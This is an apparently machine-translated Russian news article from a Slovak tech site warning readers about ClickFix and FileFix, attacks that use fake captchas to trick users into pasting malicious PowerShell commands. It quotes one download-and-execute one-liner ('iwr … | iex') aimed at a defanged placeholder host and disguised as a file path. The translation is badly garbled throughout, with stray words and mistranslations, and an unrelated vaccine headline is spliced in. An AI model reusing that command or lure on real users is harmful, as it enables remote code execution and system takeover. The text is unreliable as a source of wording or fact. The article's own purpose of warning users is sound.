Эта атака выглядит как невинный ремонт браузера. Ложная капча может лишить вас всей системы | Vosveteit.sk
Сегодня Интернет – это не только место, полное информации и развлечений, но и для хакеров, которые пытаются использовать вашу невнимательность. Одним из самых новых и необычайно хитрых способов атак является Clickfix. Это техника, которая на первый взгляд Выглядит безопасноНет Может вызвать надлежащие проблемыПолем Это было замечено на кровоточащем компьютерном портале.
Щелкните, решайте и у вас есть проблема
Все начинается Достаточно невинноПолем Представьте, что вы Googlij, немного Инструкции Или Загрузить программы с сайта, которые выглядят заслуживающими доверияПолем Вы увидите обещания за раз, например, Форма ложного улова Или “Уведомление”что ваш У браузера есть проблема, которая должна быть «отремонтирована». Нажмите кнопку, и вы даже не знаете об этом, но на свой коробки (буфер обмена) скопирован со злым кодом.
Злоумышленники знают, что большинство людей не смотрят на то, что они имеют в коробке. Таким образом, они могут соответствовать вам, чтобы поместить этот код в командную строку. Например Windows работаетчто вы запускаете с Victory + R. таким образом начнется на вашем устройстве вредный сценарий, часто написано в PowerShelli, ВОЗ Он может скачать дополнительные вредоносные программы и дать хакерам, полный доступа к вашей системе.
На практике это уже работает и довольно хорошо
Безопасная компания Имейте в виду Недавно она захватила настоящую атаку такого типа. Пользователь щелкнул ложный результат в поисковой системе,, открыл страницуГде появилась фальшивая капча, щелкнула, и система была почти сломана. Коробка была заполнена кодом PowerShell, который запустит заднюю дверь (так -то, нагладающую крыс, удаленный доступ к трояну) после вставки.
К счастью в этом случае Нажмите на решение безопасностиВОЗ узнал подозрительное использование буфера обмена а Предупредил пользователя Прежде чем что -то началось. В противном случае он может иметь один из компьютера «Традиционные» вредоносные программы как асинкрат,, Свет кражи Или ТемныйПолем
Не упускайте из виду
Универсальный рак мРНК -Vaccine может скоро стать реальностью. Ученые сообщают о огромном прогрессе
Новая версия появляется: FileFix
Как обычно, когда что -то работает, кибер -сапоги стараются улучшить технику. Последняя версия атаки называется FileFixПолем Работает так же, как и ClickFix, но цель -это -времон Windows ExplorerПолем Пользователя просят что -то положить непосредственно по адресу -Panel в исследователеПолем
Что выглядит обычным способом для файла (powershell.exe -c -c 'iwr malicious[.]Местоположение/mal.jpg | Iex ” # C: \ Company \ Internal \ Degy.pdf) на самом деле на самом деле Маскированная пауэршель -Комманд, Все раньше # – настоящий код, Остальное – просто комментарийПолем Вот как это может начать Например, загрузите вредоносное ПО С сайтаИ пользователь даже не знает, что что -то не так.
FileFix – A ClickFix AlternativeHttps: //t.co/omu7uadf9j pic.twitter.com/plqen4oahs
– Mr.D0X (@mrd0x) 23 июня 2025 года
Как избежать атаки
Лучшая защита – это Не нажимай без ума а Не копировать команды с неконтролируемых страницПолем Если что -то говорит вам, что у вас есть проблема браузера или положить что -то в терминал или адресную строку, это почти наверняка попытка атаковать. Важные веб -сайты и программы никогда не научат вас таким образом.
Программное обеспечение безопасности также является решением, которое непосредственно проверяет, что происходит в браузере, Например, имейте в виду, кто во времени захватывает подозрительное поведение и блокирует его до того, как наступит ущерб.
ClickFix и его преемник FileFix доказывают, что атаки не распространяются только по электронной почте или вложениям, но прямо через браузер и через Человеческая вераПолем Поэтому важно смотреть на стебли, Используйте здравый смысл и посмотрите, какие отдельные сайты пытаются «посоветовать»Полем
Автор публикации
КОММЕНТЫ